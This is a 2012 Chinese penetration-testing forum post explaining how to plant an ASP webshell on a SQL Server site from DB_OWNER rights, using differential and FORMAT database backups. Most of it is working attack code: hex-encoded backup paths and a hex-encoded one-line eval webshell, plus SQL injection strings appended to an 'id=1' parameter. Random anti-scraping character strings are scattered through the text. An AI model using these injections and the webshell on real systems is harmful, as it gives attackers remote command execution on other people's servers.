中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进办法 [打印本页]

---

作者: admin    时间: 2012-11-9 21:31
标题: DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:
1 w2 g0 P# L) X0 l7 v8 H
减少备份文件大小，得到可执行的webshell成功率提高不少
! a# }/ f, b( |0 R一利用差异备份
9 c9 n+ X3 Z2 V, s0 T. W6 r( F& g, V加一个参数WITH DIFFERENTIAL

+ b; j4 ?/ Q  n1
, M" N/ b8 M' }( J2
3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
5 Y3 s7 R8 E' R
二利用完全FORMAT
. [: Y  w$ w3 s3 h$ x0 c3 b加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
7 H  a9 ~9 K% b" _, a( R# S' J6 A& k
. z, F6 i/ |$ f1 {0 M1
% V8 u1 a  ~% @2 ~# m2
3
4
' ~2 L3 R5 Z8 O3 q; K' ^% V/ [ declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
) H+ s$ Q% ^. U4 p. Pdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
. ^4 p: q2 R  ?/ M6 K5 }
# _' O) s% X1 U$ U/ \/ z总的来说就是那么简单几句,下面以备份数据库model为例子
1
; z0 n5 L; z* D, C* v
7 f4 p4 T; H- X8 M. ]1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
+ K# v& B; }; c- f+ I" d
- g* l& C* m) \0 G+ A2

3 \6 r/ Y2 Z$ c% E0 X6 {1
id=1;backup database model to disk='你的路径‘ with differential,format;--
' a  G8 H* v) O, A+ x% S

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2